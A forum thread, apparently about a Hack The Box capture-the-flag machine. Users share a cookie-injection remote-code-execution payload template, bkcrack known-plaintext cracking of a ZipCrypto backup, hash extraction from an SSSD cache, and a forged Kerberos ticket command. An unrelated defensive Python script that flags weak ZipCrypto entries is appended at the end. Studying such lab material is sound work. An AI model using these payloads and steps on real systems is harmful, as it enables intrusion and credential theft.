Posts: 78 Threads: 0 Joined: N/A
September 14, 2022 at 10:17 AM

in the cve-2019-19886 article, you can find a cookie bypass introduced. structure your payload this way:

[code]
app=$cookie_app;profile=$(echo 'node_js_rce_payload'|base64 -w0)=<original-profile-content>
[/code]

anyone able to confirm if the next step after getting a shell to webster is to crack the backup.zip file or not?

by browsing the contents of the backup.zip (password protected but paths/names are visible), it seems the contents can be further used for kerberos related attacks, and from the login history of webster, the last login was from hope.windcorp.htb

yet, i'm not certain if the immediate next step after receiving a shell is to crack the backup.zip or not, because many wordlists didn't work. also tried mangling some leet forms of potential keywords.

i also found cracklib used for preventing the user from using common words as a password. but this is considered a deny list, not an allow list that can be used for mangling password lists.

thanks in advance

Posts: 18 Threads: 0 Joined: N/A
September 14, 2022 at 6:43 PM

    (September 14, 2022, 04:22 PM) Hacker2222 Wrote:

        (September 14, 2022, 10:17 AM) meowmeowattack Wrote:

            in the cve-2019-19886 article, you can find a cookie bypass introduced. structure your payload this way:
            [code]
            app=$cookie_app;profile=$(echo 'node_js_rce_payload'|base64 -w0)=<original-profile-content>
            [/code]
            anyone able to confirm if the next step after getting a shell to webster is to crack the backup.zip file or not?
            by browsing the contents of the backup.zip (password protected but paths/names are visible), it seems the contents can be further used for kerberos related attacks, and from the login history of webster, the last login was from hope.windcorp.htb
            yet, i'm not certain if the immediate next step after receiving a shell is to crack the backup.zip or not, because many wordlists didn't work. also tried mangling some leet forms of potential keywords.
            i also found cracklib used for preventing the user from using common words as a password. but this is considered a deny list, not an allow list that can be used for mangling password lists.
            thanks in advance

        i think u can crack zip with bkcrack ??

yes, the idea is that the zip includes data that we can find in the clear on the box. /etc/passwd as the classical example

Posts: 44 Threads: 0 Joined: N/A
September 14, 2022 at 8:50 PM

Can anyone share how to crack it? Tried with john - fail. Tried with bkcrack and uploaded /etc/passwd from the box:

[code]
bkcrack/bkcrack -C backup.zip -c etc/passwd -p passwd
bkcrack 1.5.0 - 2022-07-07
[14:46:02] Z reduction using 512 bytes of known plaintext
100.0 % (512 / 512)
[14:46:03] Attack on 17297 Z values at index 26
100.0 % (17297 / 17297)
[14:46:52] Could not find the keys.
[/code]

How??

Posts: 78 Threads: 0 Joined: N/A
September 14, 2022 at 9:11 PM

thanks, i was refusing to go that path for a moment. to sum it up:

[code]
# Upload `bkcrack` to the target
# create a zip of the passwd file
> cp /etc/passwd .
> zip passwd.zip passwd
# crack and this produces a sequence of codes
> ./bkcrack -C backup.zip -c etc/passwd -P passwd.zip -p passwd
# set a new pass to the encrypted file
> ./bkcrack -C backup.zip -U unlocked.zip meow -k <code1> <code2> <code3>
[/code]

Posts: 44 Threads: 0 Joined: N/A
September 14, 2022 at 9:45 PM

    (September 14, 2022, 09:11 PM) meowmeowattack Wrote:

        thanks, i was refusing to go that path for a moment. to sum it up:
        [code]
        # Upload `bkcrack` to the target
        # create a zip of the passwd file
        > cp /etc/passwd .
        > zip passwd.zip passwd
        # crack and this produces a sequence of codes
        > ./bkcrack -C backup.zip -c etc/passwd -P passwd.zip -p passwd
        # set a new pass to the encrypted file
        > ./bkcrack -C backup.zip -U unlocked.zip meow -k <code1> <code2> <code3>
        [/code]

Thanks. I was missing this .zip archive creation part and that is why I failed. Now cracked.

Posts: 78 Threads: 0 Joined: N/A
September 15, 2022 at 5:39 AM

not sure what to proceed with next after inspecting the ldb file, where you can find the domain sid, a domain user and the credential hash:

[code]
var/lib/sss/db/cache_windcorp.htb.ldb
[/code]

the credential hash can be john'd to reveal the password of the domain user. from there, can also do impersonation to get an Administrator.ccache

but the thing is, from the dns zone transfer and other info found, there are only two hosts found in the domain, webserver and hope, and none of them has any of the smb, ldap ports open. i start to wonder where to proceed next.

it is curious though, which host is serving the ssh port? it's nowhere to be found yet.

Edit: found new hosts by cracking the known_hosts file.

Posts: 57 Threads: 0 Joined: N/A
September 15, 2022 at 6:57 AM

    (September 15, 2022, 05:39 AM) meowmeowattack Wrote:

        not sure what to proceed with next after inspecting the ldb file, where you can find the domain sid, a domain user and the credential hash:
        [code]
        var/lib/sss/db/cache_windcorp.htb.ldb
        [/code]
        the credential hash can be john'd to reveal the password of the domain user. from there, can also do impersonation to get an Administrator.ccache
        but the thing is, from the dns zone transfer and other info found, there are only two hosts found in the domain, webserver and hope, and none of them has any of the smb, ldap ports open. i start to wonder where to proceed next.
        it is curious though, which host is serving the ssh port? it's nowhere to be found yet.
        Edit: found new hosts by cracking the known_hosts file.

Can you share commands for the impersonation process?

Posts: 78 Threads: 0 Joined: N/A
September 15, 2022 at 7:09 AM

    (September 15, 2022, 06:57 AM) samhub123 Wrote:

        (September 15, 2022, 05:39 AM) meowmeowattack Wrote:

            not sure what to proceed with next after inspecting the ldb file, where you can find the domain sid, a domain user and the credential hash:
            [code]
            var/lib/sss/db/cache_windcorp.htb.ldb
            [/code]
            the credential hash can be john'd to reveal the password of the domain user. from there, can also do impersonation to get an Administrator.ccache
            but the thing is, from the dns zone transfer and other info found, there are only two hosts found in the domain, webserver and hope, and none of them has any of the smb, ldap ports open. i start to wonder where to proceed next.
            it is curious though, which host is serving the ssh port? it's nowhere to be found yet.
            Edit: found new hosts by cracking the known_hosts file.

        Can you share commands for the impersonation process?

sure

* ntlm hash can be calculated using https://codebeautify.org/ntlm-hash-generator
* sid is from the ldb dump

[code]
> ticketer.py -domain-sid S-1-5-21-1844305427-4058123335-2739572863 -domain windcorp.htb -nthash D90F1699BCEF31DE19FE0658535D00CE -user-id 500 Administrator -spn webserver/hope.windcorp.htb
[/code]

any findings please share

Posts: 44 Threads: 0 Joined: N/A
September 15, 2022 at 8:27 PM

There are some firewall rules acting on this linux webserver, so we can't use proxychains here. Everything blocked. But from the inside I can use kerbrute to verify users and passwd legitimacy. However, I'm stuck with logging in:

[code]
webster@webserver:~$ kinit -f [email protected]
Password for [email protected]:
webster@webserver:~$ klist
Ticket cache: FILE:/tmp/.cache/Some.User.ccache
Default principal: [email protected]

Valid starting       Expires              Service principal
09/15/2022 22:15:01  09/16/2022 03:15:01  krbtgt/[email protected]
        renew until 09/16/2022 22:14:57
webster@webserver:~$ ksu [email protected] -n [email protected]
Authenticated [email protected]
Account [email protected]: authorization of [email protected] failed
webster@webserver:~$ ksu -n [email protected]
Authenticated [email protected]
Account root: authorization of [email protected] failed
[/code]

Something is missing. I can't find how to auth to the windows box. That sucks

Posts: 78 Threads: 0 Joined: N/A
September 15, 2022 at 8:54 PM

@Hacker2222, @onl1_f4nsye, not long after my last post, i figured that you can login to ray.duncan as a domain user as the webserver is a domain computer. believe it or not, for some reason i kept typing the wrong user name as ryan.duncan until i reviewed my notes and spotted the name was wrong.... i got the user flag

[code]
[email protected]@webserver:/$ kinit ray.duncan
[email protected]@webserver:/$ klist
[email protected]@webserver:/$ ksu
[/code]
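The backup.zip cracking discussed earlier in this thread works because the archive uses legacy ZipCrypto, which bkcrack breaks from a few hundred bytes of known plaintext; WinZip AES entries (compression method 99) are not affected. The following is an added example, not from the thread or from the bkcrack project: it reads an archive's central directory and reports which entries still rely on ZipCrypto, so backups can be audited before they are shipped. The archive builder and its three entries are constructed test data; the "encrypted" entries only carry the header bits, no real cipher.

```python
import struct
import zlib

FLAG_ENCRYPTED = 0x0001   # general-purpose flag bit 0: entry is encrypted
METHOD_AES = 99           # WinZip AE-x: real method lives in extra field 0x9901

def audit_zip_encryption(data: bytes) -> dict:
    """Map entry name -> 'plain' | 'ZipCrypto' | 'AES', read from the central directory."""
    eocd = data.rfind(b"PK\x05\x06")                      # end-of-central-directory record
    if eocd < 0: raise ValueError("no end-of-central-directory record")
    _, _, _, n_entries, _, cd_offset, _ = struct.unpack_from("<HHHHIIH", data, eocd + 4)
    result, pos = {}, cd_offset
    for _ in range(n_entries):
        if data[pos:pos + 4] != b"PK\x01\x02": raise ValueError(f"bad CD header at {pos}")
        fields = struct.unpack_from("<HHHHHHIIIHHHHHII", data, pos + 4)   # 42-byte fixed part
        flags, method, nlen, elen, clen = fields[2], fields[3], fields[9], fields[10], fields[11]
        name = data[pos + 46:pos + 46 + nlen].decode("utf-8", "replace")
        if not flags & FLAG_ENCRYPTED:
            result[name] = "plain"
        elif method == METHOD_AES:
            result[name] = "AES"
        else:
            result[name] = "ZipCrypto"   # legacy PKWARE stream cipher, known-plaintext attackable
        pos += 46 + nlen + elen + clen    # skip name, extra field and comment
    return result

def weak_entries(data: bytes) -> list:
    """Entries protected only by ZipCrypto, i.e. what a known-plaintext attack would recover."""
    return sorted(n for n, s in audit_zip_encryption(data).items() if s == "ZipCrypto")

def build_sample_zip(entries: list) -> bytes:
    """Constructed test archive from (name, payload, flags, method); data is stored as-is."""
    out, cd = bytearray(), bytearray()
    for name, payload, flags, method in entries:
        nb, crc, lho = name.encode(), zlib.crc32(payload) & 0xFFFFFFFF, len(out)
        hdr = (flags, method, 0, 0, crc, len(payload), len(payload), len(nb), 0)
        out += b"PK\x03\x04" + struct.pack("<HHHHHIIIHH", 20, *hdr) + nb + payload
        cd += b"PK\x01\x02" + struct.pack("<HHHHHHIIIHHHHHII", 20, 20, *hdr, 0, 0, 0, 0, lho) + nb
    cd_offset = len(out)
    out += cd + b"PK\x05\x06" + struct.pack("<HHHHIIH", 0, 0, len(entries), len(entries),
                                            len(cd), cd_offset, 0)
    return bytes(out)

SAMPLE = build_sample_zip([   # constructed: one ZipCrypto, one plain, one AES-marked entry
    ("etc/passwd", b"root:x:0:0:root:/root:/bin/bash\n", FLAG_ENCRYPTED, 0),
    ("notes.txt", b"hello\n", 0, 0),
    ("keys.bin", b"\x00" * 16, FLAG_ENCRYPTED, METHOD_AES),
])
```

Running `weak_entries` over a real backup flags exactly the entries whose plaintext (here a copy of /etc/passwd) an attacker could feed to a known-plaintext tool; re-packing those with AES removes the issue.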